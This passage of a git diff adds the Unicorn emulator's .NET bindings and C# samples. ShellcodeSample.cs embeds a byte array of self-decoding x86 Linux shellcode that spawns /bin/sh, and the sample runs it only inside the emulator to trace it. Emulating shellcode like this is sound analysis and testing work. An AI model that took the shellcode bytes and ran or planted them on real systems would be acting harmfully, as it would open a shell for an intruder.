Array.zeroCreate 8 + this.RegRead(regId, buffer) + bytesToInt64 buffer + + member this.EmuStart(beginAddr: Int64, untilAddr: Int64, timeout: Int64, count: Int64) = + match binding.EmuStart(_eng.[0], uint64 beginAddr, uint64 untilAddr, uint64 timeout, uint64 count) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.EmuStop() = + match binding.EmuStop(_eng.[0]) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.Close() = + match binding.Close(_eng.[0]) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.ArchSupported(arch: Int32) = + binding.ArchSupported(arch) + + member this.ErrNo() = + binding.Errono(_eng.[0]) + + member this.StrError(errorNo: Int32) = + let errorStringPointer = binding.Strerror(errorNo) + Marshal.PtrToStringAnsi(errorStringPointer) + + member 
this.AddCodeHook(callback: CodeHook, userData: Object, beginAddr: Int64, endAddr: Int64) = + let trampoline(u: IntPtr) (addr: Int64) (size: Int32) (user: IntPtr) = + _codeHooks + |> Seq.iter(fun (callback, userData) -> callback.Invoke(this, addr, size, userData)) + + if _codeHooks |> Seq.isEmpty then + let funcPointer = Marshal.GetFunctionPointerForDelegate(new CodeHookInternal(trampoline)) + let hh = new UIntPtr(allocate(IntPtr.Size)) + match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_CODE, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr) |> this.CheckResult with + | Some e -> raise e | None -> () + + _codeHooks.Add(callback, userData) + + member this.AddCodeHook(callback: CodeHook, beginAddr: Int64, endAddr: Int64) = + this.AddCodeHook(callback, null, beginAddr, endAddr) + + member this.HookDel(callback: CodeHook) = + hookDel _codeHooks callback + + member this.AddBlockHook(callback: BlockHook, userData: Object, beginAddr: Int64, endAddr: Int64) = + let trampoline(u: IntPtr) (addr: Int64) (size: Int32) (user: IntPtr) = + _blockHooks + |> Seq.iter(fun (callback, userData) -> callback.Invoke(this, addr, size, userData)) + + if _blockHooks |> Seq.isEmpty then + let funcPointer = Marshal.GetFunctionPointerForDelegate(new BlockHookInternal(trampoline)) + let hh = new UIntPtr(allocate(IntPtr.Size)) + match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_BLOCK, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr) |> this.CheckResult with + | Some e -> raise e | None -> () + + _blockHooks.Add(callback, userData) + + member this.HookDel(callback: BlockHook) = + hookDel _blockHooks callback + + member this.AddInterruptHook(callback: InterruptHook, userData: Object, hookBegin: UInt64, hookEnd : UInt64) = + let trampoline(u: IntPtr) (intNumber: Int32) (user: IntPtr) = + _interruptHooks + |> Seq.iter(fun (callback, userData) -> callback.Invoke(this, intNumber, userData)) + + if _interruptHooks |> 
Seq.isEmpty then + let funcPointer = Marshal.GetFunctionPointerForDelegate(new InterruptHookInternal(trampoline)) + let hh = new UIntPtr(allocate(IntPtr.Size)) + match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_INTR, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, hookBegin, hookEnd) |> this.CheckResult with + | Some e -> raise e | None -> () + + _interruptHooks.Add(callback, userData) + + member this.AddInterruptHook(callback: InterruptHook) = + this.AddInterruptHook(callback, null, uint64 1, uint64 0) + + member this.HookDel(callback: InterruptHook) = + hookDel _interruptHooks callback + + member this.AddMemReadHook(callback: MemReadHook, userData: Object, beginAddr: Int64, endAddr: Int64) = + let trampoline(u: IntPtr) (addr: Int64) (size: Int32) (user: IntPtr) = + _memReadHooks + |> Seq.iter(fun (callback, userData) -> callback.Invoke(this, addr, size, userData)) + + if _memReadHooks |> Seq.isEmpty then + let funcPointer = Marshal.GetFunctionPointerForDelegate(new MemReadHookInternal(trampoline)) + let hh = new UIntPtr(allocate(IntPtr.Size)) + match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_MEM_READ, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr) |> this.CheckResult with + | Some e -> raise e | None -> () + + _memReadHooks.Add(callback, userData) + + member this.HookDel(callback: MemReadHook) = + hookDel _memReadHooks callback + + member this.AddMemWriteHook(callback: MemWriteHook, userData: Object, beginAddr: Int64, endAddr: Int64) = + let trampoline(u: IntPtr) (addr: Int64) (size: Int32) (value: Int64) (user: IntPtr) = + _memWriteHooks + |> Seq.iter(fun (callback, userData) -> callback.Invoke(this, addr, size, value, userData)) + + if _memWriteHooks |> Seq.isEmpty then + let funcPointer = Marshal.GetFunctionPointerForDelegate(new MemWriteHookInternal(trampoline)) + let hh = new UIntPtr(allocate(IntPtr.Size)) + match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_MEM_WRITE, new 
UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr) |> this.CheckResult with + | Some e -> raise e | None -> () + + _memWriteHooks.Add(callback, userData) + + member this.HookDel(callback: MemWriteHook) = + hookDel _memWriteHooks callback + + member this.AddEventMemHook(callback: EventMemHook, eventType: Int32, userData: Object) = + let trampoline(u: IntPtr) (eventType: Int32) (addr: Int64) (size: Int32) (value: Int64) (user: IntPtr) = + _memEventHooks.Keys + |> Seq.filter(fun eventFlag -> (eventType &&& eventFlag) <> 0) + |> Seq.map(fun eventflag -> _memEventHooks.[eventflag]) + |> Seq.concat + |> Seq.map(fun (callback, userData) -> callback.Invoke(this, eventType, addr, size, value, userData)) + |> Seq.forall id + + // register the event if not already done + _memEventHooks.Keys + |> Seq.filter(fun eventFlag -> (eventType &&& eventFlag) <> 0) + |> Seq.filter(fun eventFlag -> _memEventHooks.[eventFlag] |> Seq.isEmpty) + |> Seq.iter(fun eventFlag -> + let funcPointer = Marshal.GetFunctionPointerForDelegate(new EventMemHookInternal(trampoline)) + let hh = new UIntPtr(allocate(IntPtr.Size)) + match binding.HookAddNoarg(_eng.[0], hh, eventFlag, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 0, uint64 0) |> this.CheckResult with + | Some e -> raise e | None -> () + ) + + // register the callbacks + _memEventHooks.Keys + |> Seq.filter(fun eventFlag -> (eventType &&& eventFlag) <> 0) + |> Seq.iter(fun eventFlag -> _memEventHooks.[eventFlag].Add((callback, userData))) + + member this.AddEventMemHook(callback: EventMemHook, eventType: Int32) = + this.AddEventMemHook(callback, eventType, null) + + member this.HookDel(callback: EventMemHook) = + let callbacks = (_memEventHooks.Values |> Seq.concat).ToList() + hookDel callbacks callback + + member this.AddInHook(callback: InHook, userData: Object) = + let trampoline(u: IntPtr) (port: Int32) (size: Int32) (user: IntPtr) = + _inHooks + |> Seq.map(fun (callback, userData) -> 
callback.Invoke(this, port, size, userData)) + |> Seq.last + + if _inHooks |> Seq.isEmpty then + let funcPointer = Marshal.GetFunctionPointerForDelegate(new InHookInternal(trampoline)) + let hh = new UIntPtr(allocate(IntPtr.Size)) + match binding.HookAddArg0(_eng.[0], hh, Common.UC_HOOK_INSN, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 0, uint64 0, X86.UC_X86_INS_IN) |> this.CheckResult with + | Some e -> raise e | None -> () + + _inHooks.Add(callback, userData) + + member this.AddInHook(callback: InHook) = + this.AddInHook(callback, null) + + member this.AddOutHook(callback: OutHook, userData: Object) = + let trampoline(u: IntPtr) (port: Int32) (size: Int32) (value: Int32) (user: IntPtr) = + _outHooks + |> Seq.iter(fun (callback, userData) -> callback.Invoke(this, port, size, value, userData)) + + if _outHooks |> Seq.isEmpty then + let funcPointer = Marshal.GetFunctionPointerForDelegate(new OutHookInternal(trampoline)) + let hh = new UIntPtr(allocate(IntPtr.Size)) + match binding.HookAddArg0(_eng.[0], hh, Common.UC_HOOK_INSN, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 0, uint64 0, X86.UC_X86_INS_OUT) |> this.CheckResult with + | Some e -> raise e | None -> () + + _outHooks.Add(callback, userData) + + member this.AddOutHook(callback: OutHook) = + this.AddOutHook(callback, null) + + member this.AddSyscallHook(callback: SyscallHook, userData: Object) = + let trampoline(u: IntPtr) (user: IntPtr) = + _syscallHooks + |> Seq.iter(fun (callback, userData) -> callback.Invoke(this, userData)) + + if _syscallHooks |> Seq.isEmpty then + let funcPointer = Marshal.GetFunctionPointerForDelegate(new SyscallHookInternal(trampoline)) + let hh = new UIntPtr(allocate(IntPtr.Size)) + match binding.HookAddArg0(_eng.[0], hh, Common.UC_HOOK_INSN, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 0, uint64 0, X86.UC_X86_INS_SYSCALL) |> this.CheckResult with + | Some e -> raise e | None -> () + + _syscallHooks.Add(callback, userData) + + member 
this.AddSyscallHook(callback: SyscallHook) = + this.AddSyscallHook(callback, null) + + member this.Version() = + let (major, minor) = (new UIntPtr(), new UIntPtr()) + let combined = binding.Version(major, minor) + (major.ToUInt32(), minor.ToUInt32(), combined) + + abstract Dispose : Boolean -> unit + default this.Dispose(disposing: Boolean) = + if (disposing) then + // free managed resources, this is the default dispose implementation pattern + () + + _disposablePointers + |> Seq.filter(fun pointer -> pointer <> IntPtr.Zero) + |> Seq.iter Marshal.FreeHGlobal + _disposablePointers.Clear() + + member this.Dispose() = + this.Dispose(true) + GC.SuppressFinalize(this) + + override this.Finalize() = + this.Dispose(false) + + interface IDisposable with + member this.Dispose() = + this.Dispose() \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/UnicornEngineException.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/UnicornEngineException.fs new file mode 100644 index 0000000..fd58255 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/UnicornEngineException.fs @@ -0,0 +1,9 @@ +namespace UnicornManaged + +open System + +type UnicornEngineException(errNo: Int32, msg: String) = + inherit ApplicationException(msg) + + member this.ErrorNo = errNo + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/UnicornManaged.fsproj b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/UnicornManaged.fsproj new file mode 100644 index 0000000..e10cd73 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/UnicornManaged.fsproj @@ -0,0 +1,87 @@ + + + + + Debug + AnyCPU + 2.0 + 0c21f1c1-2725-4a46-9022-1905f85822a5 + Library + UnicornManaged + UnicornManaged + v4.5 + 4.3.1.0 + true + UnicornManaged + + + + true + full + false + false + bin\Debug\ + DEBUG;TRACE + 3 + 
bin\Debug\UnicornManaged.XML + + + pdbonly + true + true + bin\Release\ + TRACE + 3 + bin\Release\UnicornManaged.XML + + + + + True + + + + + + + + + + + + + + + + + + + + + + + + + 11 + + + + + $(MSBuildExtensionsPath32)\..\Microsoft SDKs\F#\3.0\Framework\v4.0\Microsoft.FSharp.Targets + + + + + $(MSBuildExtensionsPath32)\Microsoft\VisualStudio\v$(VisualStudioVersion)\FSharp\Microsoft.FSharp.Targets + + + + + + \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/App.config b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/App.config new file mode 100644 index 0000000..d1428ad --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/App.config @@ -0,0 +1,6 @@ + + + + + + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/Program.cs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/Program.cs new file mode 100644 index 0000000..41cfb19 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/Program.cs @@ -0,0 +1,23 @@ +using System; + +namespace UnicornSamples +{ + class Program + { + static void Main(string[] args) + { + // X86 tests 32bit + X86Sample32.X86Code32(); + X86Sample32.X86Code32InvalidMemRead(); + X86Sample32.X86Code32InvalidMemWriteWithRuntimeFix(); + X86Sample32.X86Code32InOut(); + + // Run all shellcode tests + ShellcodeSample.X86Code32Self(); + ShellcodeSample.X86Code32(); + + Console.Write("Tests completed"); + Console.ReadLine(); + } + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/Properties/AssemblyInfo.cs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/Properties/AssemblyInfo.cs new file mode 100644 index 0000000..aacf2f8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/Properties/AssemblyInfo.cs @@ -0,0 +1,36 @@ +using System.Reflection; 
+using System.Runtime.CompilerServices; +using System.Runtime.InteropServices; + +// General Information about an assembly is controlled through the following +// set of attributes. Change these attribute values to modify the information +// associated with an assembly. +[assembly: AssemblyTitle("UnicornSamples")] +[assembly: AssemblyDescription("")] +[assembly: AssemblyConfiguration("")] +[assembly: AssemblyCompany("")] +[assembly: AssemblyProduct("UnicornSamples")] +[assembly: AssemblyCopyright("Copyright © Antonio Parata 2016")] +[assembly: AssemblyTrademark("")] +[assembly: AssemblyCulture("")] + +// Setting ComVisible to false makes the types in this assembly not visible +// to COM components. If you need to access a type in this assembly from +// COM, set the ComVisible attribute to true on that type. +[assembly: ComVisible(false)] + +// The following GUID is for the ID of the typelib if this project is exposed to COM +[assembly: Guid("b80b5987-1e24-4309-8bf9-c4f91270f21c")] + +// Version information for an assembly consists of the following four values: +// +// Major Version +// Minor Version +// Build Number +// Revision +// +// You can specify all the values or you can default the Build and Revision Numbers +// by using the '*' as shown below: +// [assembly: AssemblyVersion("1.0.*")] +[assembly: AssemblyVersion("1.0.0.0")] +[assembly: AssemblyFileVersion("1.0.0.0")] diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/ShellcodeSample.cs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/ShellcodeSample.cs new file mode 100644 index 0000000..be654d6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/ShellcodeSample.cs @@ -0,0 +1,195 @@ +using Gee.External.Capstone; +using Gee.External.Capstone.X86; +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.Linq; +using System.Reflection; +using System.Text; +using System.Threading.Tasks; 
+using UnicornManaged; +using UnicornManaged.Const; + +namespace UnicornSamples +{ + internal class ShellcodeSample + { + private const Int64 ADDRESS = 0x1000000; + + public static void X86Code32Self() + { + Byte[] X86_CODE32_SELF = + { + 0xeb, 0x1c, 0x5a, 0x89, 0xd6, 0x8b, 0x02, 0x66, 0x3d, 0xca, 0x7d, 0x75, 0x06, 0x66, 0x05, 0x03, 0x03, + 0x89, 0x02, 0xfe, 0xc2, 0x3d, 0x41, 0x41, 0x41, 0x41, 0x75, 0xe9, 0xff, 0xe6, 0xe8, 0xdf, 0xff, 0xff, + 0xff, 0x31, 0xd2, 0x6a, 0x0b, 0x58, 0x99, 0x52, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, + 0x6e, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xca, 0x7d, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41 + }; + + Run(X86_CODE32_SELF); + } + + public static void X86Code32() + { + Byte[] X86_CODE32 = + { + 0xeb, 0x19, 0x31, 0xc0, 0x31, 0xdb, 0x31, 0xd2, 0x31, 0xc9, 0xb0, 0x04, 0xb3, 0x01, 0x59, 0xb2, 0x05, + 0xcd, 0x80, 0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80, 0xe8, 0xe2, 0xff, 0xff, 0xff, 0x68, 0x65, + 0x6c, 0x6c, 0x6f + }; + + Run(X86_CODE32); + } + + private static void Run(Byte[] code) + { + Console.WriteLine(); + var stackTrace = new StackTrace(); + var stackFrame = stackTrace.GetFrames()[1]; + var methodName = stackFrame.GetMethod().Name; + + Console.WriteLine("*** Start: " + methodName); + RunTest(code, ADDRESS); + Console.WriteLine("*** End: " + methodName); + Console.WriteLine(); + } + + + private static void RunTest(Byte[] code, Int64 address) + { + try + { + using (var u = new Unicorn(Common.UC_ARCH_X86, Common.UC_MODE_32)) + using(var disassembler = CapstoneDisassembler.CreateX86Disassembler(DisassembleMode.Bit32)) + { + Console.WriteLine("Unicorn version: {0}", u.Version()); + + // map 2MB of memory for this emulation + u.MemMap(address, 2 * 1024 * 1024, Common.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.MemWrite(address, code); + + // initialize machine registers + u.RegWrite(X86.UC_X86_REG_ESP, Utils.Int64ToBytes(address + 0x200000)); + + var regv = new Byte[4]; + 
u.RegRead(X86.UC_X86_REG_ESP, regv); + + // tracing all instructions by having @begin > @end + u.AddCodeHook((uc, addr, size, userData) => CodeHookCallback(disassembler, uc, addr, size, userData), 1, 0); + + // handle interrupt ourself + u.AddInterruptHook(InterruptHookCallback); + + // handle SYSCALL + u.AddSyscallHook(SyscallHookCallback); + + Console.WriteLine(">>> Start tracing code"); + + // emulate machine code in infinite time + u.EmuStart(address, address + code.Length, 0u, 0u); + + Console.WriteLine(">>> Emulation Done!"); + } + } + catch (UnicornEngineException ex) + { + Console.Error.WriteLine("Emulation FAILED! " + ex.Message); + } + } + + private static void CodeHookCallback( + CapstoneDisassembler disassembler, + Unicorn u, + Int64 addr, + Int32 size, + Object userData) + { + Console.Write("[+] 0x{0}: ", addr.ToString("X")); + + var eipBuffer = new Byte[4]; + u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); + + var effectiveSize = Math.Min(16, size); + var tmp = new Byte[effectiveSize]; + u.MemRead(addr, tmp); + + var sb = new StringBuilder(); + foreach (var t in tmp) + { + sb.AppendFormat("{0} ", (0xFF & t).ToString("X")); + } + Console.Write("{0,-20}", sb); + Console.WriteLine(Utils.Disassemble(disassembler, tmp)); + } + + private static void SyscallHookCallback(Unicorn u, Object userData) + { + var eaxBuffer = new Byte[4]; + u.RegRead(X86.UC_X86_REG_EAX, eaxBuffer); + var eax = Utils.ToInt(eaxBuffer); + + Console.WriteLine("[!] Syscall EAX = 0x{0}", eax.ToString("X")); + + u.EmuStop(); + } + + private static void InterruptHookCallback(Unicorn u, Int32 intNumber, Object userData) + { + // only handle Linux syscall + if (intNumber != 0x80) + { + return; + } + + var eaxBuffer = new Byte[4]; + var eipBuffer = new Byte[4]; + + u.RegRead(X86.UC_X86_REG_EAX, eaxBuffer); + u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); + + var eax = Utils.ToInt(eaxBuffer); + var eip = Utils.ToInt(eipBuffer); + + switch (eax) + { + default: + Console.WriteLine("[!] 
Interrupt 0x{0} num {1}, EAX=0x{2}", eip.ToString("X"), intNumber.ToString("X"), eax.ToString("X")); + break; + case 1: // sys_exit + Console.WriteLine("[!] Interrupt 0x{0} num {1}, SYS_EXIT", eip.ToString("X"), intNumber.ToString("X")); + u.EmuStop(); + break; + case 4: // sys_write + + // ECX = buffer address + var ecxBuffer = new Byte[4]; + + // EDX = buffer size + var edxBuffer = new Byte[4]; + + u.RegRead(X86.UC_X86_REG_ECX, ecxBuffer); + u.RegRead(X86.UC_X86_REG_EDX, edxBuffer); + + var ecx = Utils.ToInt(ecxBuffer); + var edx = Utils.ToInt(edxBuffer); + + // read the buffer in + var size = Math.Min(256, edx); + var buffer = new Byte[size]; + u.MemRead(ecx, buffer); + var content = Encoding.Default.GetString(buffer); + + Console.WriteLine( + "[!] Interrupt 0x{0}: num {1}, SYS_WRITE. buffer = 0x{2}, size = , content = '{3}'", + eip.ToString("X"), + ecx.ToString("X"), + edx.ToString("X"), + content); + + break; + } + } + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/UnicornSamples.csproj b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/UnicornSamples.csproj new file mode 100644 index 0000000..3a087b0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/UnicornSamples.csproj @@ -0,0 +1,108 @@ + + + + + Debug + AnyCPU + {B80B5987-1E24-4309-8BF9-C4F91270F21C} + Exe + Properties + UnicornSamples + UnicornSamples + v4.5 + 512 + true + + publish\ + true + Disk + false + Foreground + 7 + Days + false + false + true + 0 + 1.0.0.%2a + false + false + true + + + x86 + true + full + false + bin\Debug\ + DEBUG;TRACE + prompt + 4 + false + false + + + AnyCPU + pdbonly + true + bin\Release\ + TRACE + prompt + 4 + + + + ..\packages\Gee.External.Capstone.1.2.2\lib\net45\Gee.External.Capstone.dll + True + + + + + + + + + + + + + + + + + + + + + + + + False + Microsoft .NET Framework 4.5 %28x86 and x64%29 + true + + + False + .NET Framework 3.5 SP1 + false + + + + + 
{0c21f1c1-2725-4a46-9022-1905f85822a5} + UnicornManaged + + + + + + + + + \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/Utils.cs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/Utils.cs new file mode 100644 index 0000000..1f4d287 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/Utils.cs @@ -0,0 +1,47 @@ +using Gee.External.Capstone; +using Gee.External.Capstone.X86; +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; +using System.Threading.Tasks; + +namespace UnicornSamples +{ + internal static class Utils + { + public static Int64 ToInt(Byte[] val) + { + UInt64 res = 0; + for (var i = 0; i < val.Length; i++) + { + var v = val[i] & 0xFF; + res += (UInt64)(v << (i * 8)); + } + return (Int64)res; + } + + public static Byte[] Int64ToBytes(Int64 intVal) + { + var res = new Byte[8]; + var uval = (UInt64)intVal; + for (var i = 0; i < res.Length; i++) + { + res[i] = (Byte)(uval & 0xff); + uval = uval >> 8; + } + return res; + } + + public static String Disassemble(CapstoneDisassembler disassembler, Byte[] code) + { + var sb = new StringBuilder(); + var instructions = disassembler.DisassembleAll(code); + foreach (var instruction in instructions) + { + sb.AppendFormat("{0} {1}{2}", instruction.Mnemonic, instruction.Operand, Environment.NewLine); + } + return sb.ToString().Trim(); + } + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/X86Sample32.cs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/X86Sample32.cs new file mode 100644 index 0000000..6bcd830 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/X86Sample32.cs @@ -0,0 +1,328 @@ +using Gee.External.Capstone; +using Gee.External.Capstone.X86; +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.Linq; +using 
System.Reflection; +using System.Text; +using System.Threading.Tasks; +using UnicornManaged; +using UnicornManaged.Const; + +namespace UnicornSamples +{ + internal class X86Sample32 + { + private const Int64 ADDRESS = 0x1000000; + + public static void X86Code32() + { + Byte[] X86_CODE32 = + { + // INC ecx; DEC edx + 0x41, 0x4a + }; + Run(X86_CODE32); + } + + public static void X86Code32InvalidMemRead() + { + Byte[] X86_CODE32_MEM_READ = + { + // mov ecx,[0xaaaaaaaa]; INC ecx; DEC edx + 0x8B, 0x0D, 0xAA, 0xAA, 0xAA, 0xAA, 0x41, 0x4a + }; + Run(X86_CODE32_MEM_READ); + } + + public static void X86Code32InvalidMemWriteWithRuntimeFix() + { + Byte[] X86_CODE32_MEM_WRITE = + { + // mov [0xaaaaaaaa], ecx; INC ecx; DEC edx + 0x89, 0x0D, 0xAA, 0xAA, 0xAA, 0xAA, 0x41, 0x4a + }; + Run(X86_CODE32_MEM_WRITE); + } + + public static void X86Code32InOut() + { + Byte[] X86_CODE32_INOUT = + { + // INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, AL; INC ebx + 0x41, 0xE4, 0x3F, 0x4a, 0xE6, 0x46, 0x43 + }; + Run(X86_CODE32_INOUT); + } + + + private static void Run(Byte[] code, Boolean raiseException = false) + { + Console.WriteLine(); + var stackTrace = new StackTrace(); + var stackFrame = stackTrace.GetFrames()[1]; + var methodName = stackFrame.GetMethod().Name; + + Console.WriteLine("*** Start: " + methodName); + Exception e = null; + try + { + RunTest(code, ADDRESS, Common.UC_MODE_32); + } + catch (UnicornEngineException ex) + { + e = ex; + } + + if (!raiseException && e != null) + { + Console.Error.WriteLine("Emulation FAILED! 
" + e.Message); + } + + Console.WriteLine("*** End: " + methodName); + Console.WriteLine(); + } + + private static void RunTest(Byte[] code, Int64 address, Int32 mode) + { + using (var u = new Unicorn(Common.UC_ARCH_X86, mode)) + using (var disassembler = CapstoneDisassembler.CreateX86Disassembler(DisassembleMode.Bit32)) + { + Console.WriteLine("Unicorn version: {0}", u.Version()); + + // map 2MB of memory for this emulation + u.MemMap(address, 2 * 1024 * 1024, Common.UC_PROT_ALL); + + // initialize machine registers + u.RegWrite(X86.UC_X86_REG_EAX, 0x1234); + u.RegWrite(X86.UC_X86_REG_ECX, 0x1234); + u.RegWrite(X86.UC_X86_REG_EDX, 0x7890); + + // write machine code to be emulated to memory + u.MemWrite(address, code); + + // initialize machine registers + u.RegWrite(X86.UC_X86_REG_ESP, Utils.Int64ToBytes(address + 0x200000)); + + // handle IN & OUT instruction + u.AddInHook(InHookCallback); + u.AddOutHook(OutHookCallback); + + // tracing all instructions by having @begin > @end + u.AddCodeHook((uc, addr, size, userData) => CodeHookCallback(disassembler, uc, addr, size, userData), 1, 0); + + // handle interrupt ourself + u.AddInterruptHook(InterruptHookCallback); + + // handle SYSCALL + u.AddSyscallHook(SyscallHookCallback); + + // intercept invalid memory events + u.AddEventMemHook(MemMapHookCallback, Common.UC_HOOK_MEM_READ_UNMAPPED | Common.UC_HOOK_MEM_WRITE_UNMAPPED); + + Console.WriteLine(">>> Start tracing code"); + + // emulate machine code in infinite time + u.EmuStart(address, address + code.Length, 0u, 0u); + + // print registers + var ecx = u.RegRead(X86.UC_X86_REG_ECX); + var edx = u.RegRead(X86.UC_X86_REG_EDX); + var eax = u.RegRead(X86.UC_X86_REG_EAX); + Console.WriteLine("[!] EAX = {0}", eax.ToString("X")); + Console.WriteLine("[!] ECX = {0}", ecx.ToString("X")); + Console.WriteLine("[!] 
EDX = {0}", edx.ToString("X")); + + Console.WriteLine(">>> Emulation Done!"); + } + } + + private static Int32 InHookCallback(Unicorn u, Int32 port, Int32 size, Object userData) + { + var eip = u.RegRead(X86.UC_X86_REG_EIP); + Console.WriteLine("[!] Reading from port 0x{0}, size: {1}, address: 0x{2}", port.ToString("X"), size.ToString("X"), eip.ToString("X")); + var res = 0; + switch (size) + { + case 1: + // read 1 byte to AL + res = 0xf1; + break; + case 2: + // read 2 byte to AX + res = 0xf2; + break; + case 4: + // read 4 byte to EAX + res = 0xf4; + break; + } + + Console.WriteLine("[!] Return value: {0}", res.ToString("X")); + return res; + } + + private static void OutHookCallback(Unicorn u, Int32 port, Int32 size, Int32 value, Object userData) + { + var eip = u.RegRead(X86.UC_X86_REG_EIP); + Console.WriteLine("[!] Writing to port 0x{0}, size: {1}, value: 0x{2}, address: 0x{3}", port.ToString("X"), size.ToString("X"), value.ToString("X"), eip.ToString("X")); + + // confirm that value is indeed the value of AL/ AX / EAX + var v = 0L; + var regName = String.Empty; + switch (size) + { + case 1: + // read 1 byte in AL + v = u.RegRead(X86.UC_X86_REG_AL); + regName = "AL"; + break; + case 2: + // read 2 byte in AX + v = u.RegRead(X86.UC_X86_REG_AX); + regName = "AX"; + break; + case 4: + // read 4 byte in EAX + v = u.RegRead(X86.UC_X86_REG_EAX); + regName = "EAX"; + break; + } + + Console.WriteLine("[!] Register {0}: {1}", regName, v.ToString("X")); + } + + private static Boolean MemMapHookCallback(Unicorn u, Int32 eventType, Int64 address, Int32 size, Int64 value, Object userData) + { + if (eventType == Common.UC_MEM_WRITE_UNMAPPED) + { + Console.WriteLine("[!] Missing memory is being WRITE at 0x{0}, data size = {1}, data value = 0x{2}. 
Map memory.", address.ToString("X"), size.ToString("X"), value.ToString("X")); + u.MemMap(0xaaaa0000, 2 * 1024 * 1024, Common.UC_PROT_ALL); + return true; + } + else + { + return false; + } + } + + private static void CodeHookCallback1( + CapstoneDisassembler disassembler, + Unicorn u, + Int64 addr, + Int32 size, + Object userData) + { + Console.Write("[+] 0x{0}: ", addr.ToString("X")); + + var eipBuffer = new Byte[4]; + u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); + + var effectiveSize = Math.Min(16, size); + var tmp = new Byte[effectiveSize]; + u.MemRead(addr, tmp); + + var sb = new StringBuilder(); + foreach (var t in tmp) + { + sb.AppendFormat("{0} ", (0xFF & t).ToString("X")); + } + Console.Write("{0,-20}", sb); + Console.WriteLine(Utils.Disassemble(disassembler, tmp)); + } + + private static void CodeHookCallback( + CapstoneDisassembler disassembler, + Unicorn u, + Int64 addr, + Int32 size, + Object userData) + { + Console.Write("[+] 0x{0}: ", addr.ToString("X")); + + var eipBuffer = new Byte[4]; + u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); + + var effectiveSize = Math.Min(16, size); + var tmp = new Byte[effectiveSize]; + u.MemRead(addr, tmp); + + var sb = new StringBuilder(); + foreach (var t in tmp) + { + sb.AppendFormat("{0} ", (0xFF & t).ToString("X")); + } + Console.Write("{0,-20}", sb); + Console.WriteLine(Utils.Disassemble(disassembler, tmp)); + } + + private static void SyscallHookCallback(Unicorn u, Object userData) + { + var eaxBuffer = new Byte[4]; + u.RegRead(X86.UC_X86_REG_EAX, eaxBuffer); + var eax = Utils.ToInt(eaxBuffer); + + Console.WriteLine("[!] 
